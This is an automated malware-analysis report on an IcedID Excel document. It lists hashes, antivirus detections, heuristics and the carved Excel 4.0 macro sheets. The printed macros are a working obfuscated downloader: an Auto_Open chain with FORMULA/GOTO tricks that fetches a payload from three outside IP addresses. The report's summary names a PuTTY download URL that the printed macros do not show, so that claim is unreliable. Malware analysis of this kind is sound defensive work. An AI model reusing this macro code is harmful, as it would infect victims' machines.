IcedID Office (OOXML) malware analysis — malicious · b9c30398b92f8057

MALICIOUS

Office (OOXML)

173.3 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-05-23

MD5: dc4da10a346f78e1a0af089b2b2ea51d SHA-1: 176074eb9a18a443204327028c514cd2c77d1616 SHA-256: b9c30398b92f80576e5b00d5bf2854c8447e794cb079e76e9cca1e830d74c513

250 Risk Score

Malware Insights

IcedID · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

This Excel document contains multiple Excel 4.0 macro sheets, including one with an Auto_Open defined name, indicating it's designed to execute automatically. The macros utilize dangerous functions like FORMULA, GOTO, and HALT to call Win32 APIs, specifically for downloading a file from 'http://the.earth.li/~sgtatham/putty/0.72/w32/putty.exe' and registering it as a server. This behavior is consistent with the IcedID malware family, which often uses macro-enabled documents as a downloader.

Heuristics 6

ClamAV: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0
Excel 4.0 macro sheet (6 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME

Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
Dangerous XLM formula APIs: FORMULA, GOTO, HALT critical OOXML_XLM_DANGEROUS_FN

Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET

Excel workbook contains 6 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 6

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet1.xml	1190 bytes
SHA-256: `e26278d9df62929caddc39c2675d1a93c805965a35896b4c4240468b728373e2`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0000-000000000000}"><dimension ref="A1"/><sheetViews><sheetView showFormulas="1" tabSelected="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="9.140625" style="2"/></cols><sheetData/><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><drawing r:id="rId1"/></xm:macrosheet>
`xlm_sheet_01.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet2.xml	3126 bytes
SHA-256: `6e574d187258cfb8b214ca66385682d3f0b084f350ab4d4bac670b49a1c9b987`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0100-000000000000}"><dimension ref="C20:G35"/><sheetViews><sheetView showFormulas="1" topLeftCell="A4" workbookViewId="0"><selection activeCell="A4" sqref="A4"/></sheetView></sheetViews><sheetFormatPr defaultColWidth="8.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="8.5703125" style="1"/></cols><sheetData><row r="20" spans="3:7" x14ac:dyDescent="0.25"><c r="F20" s="1" t="b"><f>FORMULA(Sheet000!P16&Sheet000!P17,F27)=PI()=PI()=PI()</f><v>0</v></c></row><row r="23" spans="3:7" x14ac:dyDescent="0.25"><c r="F23" s="1" t="str"><f>NOW()&".dat"</f><v>44329,6550195602.dat</v></c></row><row r="25" spans="3:7" x14ac:dyDescent="0.25"><c r="C25" s="1" t="s"><v>4</v></c></row><row r="26" spans="3:7" x14ac:dyDescent="0.25"><c r="C26" s="1" t="s"><v>6</v></c></row><row r="27" spans="3:7" x14ac:dyDescent="0.25"><c r="C27" s="1" t="s"><v>5</v></c><c r="G27" s="1" t="str"><f>"htt"</f><v>htt</v></c></row><row r="28" spans="3:7" x14ac:dyDescent="0.25"><c r="C28" s="1" t="s"><v>16</v></c><c r="E28" s="1" t="str"><f>"188.119.113.64/"</f><v>188.119.113.64/</v></c><c r="F28" s="1" t="e"><f>JKKHYUGFD(0,G27&G28&E28&F23,"..\lertio.cersw",0,0)</f><v>#NAME?</v></c><c r="G28" s="1" t="s"><v>12</v></c></row><row r="29" spans="3:7" x14ac:dyDescent="0.25"><c r="C29" s="1" t="s"><v>15</v></c><c r="E29" s="1" t="str"><f>"51.89.115.99/"</f><v>51.89.115.99/</v></c><c r="F29" s="1" t="e"><f>JKKHYUGFD(0,G27&G28&E29&F23,"..\lertio.cersw1",0,0)</f><v>#NAME?</v></c></row><row r="30" spans="3:7" x14ac:dyDescent="0.25"><c r="C30" s="1" t="s"><v>1</v></c><c r="E30" s="1" t="str"><f>"94.140.115.67/"</f><v>94.140.115.67/</v></c><c r="F30" s="1" t="e"><f>JKKHYUGFD(0,G27&G28&E30&F23,"..\lertio.cersw2",0,0)</f><v>#NAME?</v></c></row><row r="31" spans="3:7" x14ac:dyDescent="0.25"><c r="C31" s="1" t="s"><v>0</v></c><c r="E31" s="1" t="s"><v>7</v></c></row><row r="32" spans="3:7" x14ac:dyDescent="0.25"><c r="E32" s="1" t="s"><v>7</v></c></row><row r="33" spans="5:6" x14ac:dyDescent="0.25"><c r="E33" s="1" t="s"><v>7</v></c></row><row r="35" spans="5:6" x14ac:dyDescent="0.25"><c r="F35" s="1" t="e"><f>GOTO(Sheet2!H13)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
`xlm_sheet_02.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet3.xml	2298 bytes
SHA-256: `60860e3e942fc249672c3f297fa7f4b06db5f5d49d084784eafb2c3e4889ad39`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0200-000000000000}"><dimension ref="H19:L31"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="8.140625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="8.140625" style="1"/><col min="8" max="9" width="8.140625" style="1" customWidth="1"/><col min="10" max="16384" width="8.140625" style="1"/></cols><sheetData><row r="19" spans="8:12" x14ac:dyDescent="0.25"><c r="H19" s="1" t="b"><f>FORMULA(Sheet000!J17&Sheet000!J18&Sheet000!J19,H25)=PI()=PI()=PI()</f><v>0</v></c><c r="J19" s="1" t="s"><v>4</v></c></row><row r="20" spans="8:12" x14ac:dyDescent="0.25"><c r="J20" s="1" t="s"><v>13</v></c></row><row r="21" spans="8:12" x14ac:dyDescent="0.25"><c r="J21" s="1" t="s"><v>14</v></c></row><row r="22" spans="8:12" x14ac:dyDescent="0.25"><c r="J22" s="1" t="s"><v>8</v></c><c r="K22" s="1" t="s"><v>11</v></c><c r="L22" s="1" t="s"><v>10</v></c></row><row r="23" spans="8:12" x14ac:dyDescent="0.25"><c r="J23" s="1" t="s"><v>9</v></c></row><row r="24" spans="8:12" x14ac:dyDescent="0.25"><c r="J24" s="1" t="s"><v>3</v></c></row><row r="25" spans="8:12" x14ac:dyDescent="0.25"><c r="J25" s="1" t="s"><v>2</v></c></row><row r="31" spans="8:12" x14ac:dyDescent="0.25"><c r="H31" s="1" t="e"><f>GOTO(Sheet3!G2)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
`xlm_sheet_03.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet4.xml	2025 bytes
SHA-256: `f6023b616a33da16850bd04bca335ab61b8bf9717cbe0a8ef91527cea67ae7fd`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{1155E9B9-B0CD-42F9-A966-3A754062B27E}"><dimension ref="G16:G23"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="7.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="4" width="7.7109375" style="1"/><col min="5" max="5" width="8.85546875" style="1" customWidth="1"/><col min="6" max="6" width="8.42578125" style="1" customWidth="1"/><col min="7" max="7" width="10" style="1" customWidth="1"/><col min="8" max="8" width="8.7109375" style="1" customWidth="1"/><col min="9" max="9" width="7.7109375" style="1"/><col min="10" max="10" width="8.140625" style="1" customWidth="1"/><col min="11" max="11" width="7.7109375" style="1"/><col min="12" max="12" width="8.140625" style="1" customWidth="1"/><col min="13" max="16384" width="7.7109375" style="1"/></cols><sheetData><row r="16" spans="7:7" x14ac:dyDescent="0.25"><c r="G16" s="1" t="b"><f>FORMULA(Sheet000!J17&Sheet000!J21&Sheet000!J19,G19)=PI()=PI()=PI()</f><v>0</v></c></row><row r="23" spans="7:7" x14ac:dyDescent="0.25"><c r="G23" s="1" t="e"><f>GOTO(Sheet4!G5)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
`xlm_sheet_04.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet5.xml	1560 bytes
SHA-256: `d60ca3a864e3f818e7a00f9aa3f6fdbc180e13ef9ef26c0d3de35bf633fcfa97`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{8D29E0F2-14A8-4D3C-A016-AA1287FA05D1}"><dimension ref="G16:G23"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="8" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="6" width="8" style="1"/><col min="7" max="7" width="7.85546875" style="1" customWidth="1"/><col min="8" max="16384" width="8" style="1"/></cols><sheetData><row r="16" spans="7:7" x14ac:dyDescent="0.25"><c r="G16" s="1" t="b"><f>FORMULA(Sheet000!J17&Sheet000!J22&Sheet000!J19,G19)=PI()=PI()=PI()</f><v>0</v></c></row><row r="23" spans="7:7" x14ac:dyDescent="0.25"><c r="G23" s="1" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
`xlm_sheet_05.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.xml	1821 bytes
SHA-256: `dd9efeb7c324f68d06e9a7e99610df77ef935e2fc86a64fc3a473904f7bcfe45`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{65E179ED-D9FF-4EED-BC75-2D2CB5EF5CA2}"><dimension ref="A10:B15"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"><selection activeCell="A2" sqref="A2"/></sheetView></sheetViews><sheetFormatPr defaultColWidth="8.28515625" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="1" width="9.140625" style="1" customWidth="1"/><col min="2" max="3" width="8.28515625" style="1"/><col min="4" max="4" width="9.5703125" style="1" customWidth="1"/><col min="5" max="5" width="10.42578125" style="1" customWidth="1"/><col min="6" max="16384" width="8.28515625" style="1"/></cols><sheetData><row r="10" spans="1:2" x14ac:dyDescent="0.25"><c r="A10" s="1" t="b"><f>ON.TIME(NOW()+"00:00:02",B10)</f><v>0</v></c><c r="B10" s="1" t="s"><v>17</v></c></row><row r="15" spans="1:2" x14ac:dyDescent="0.25"><c r="A15" s="1" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.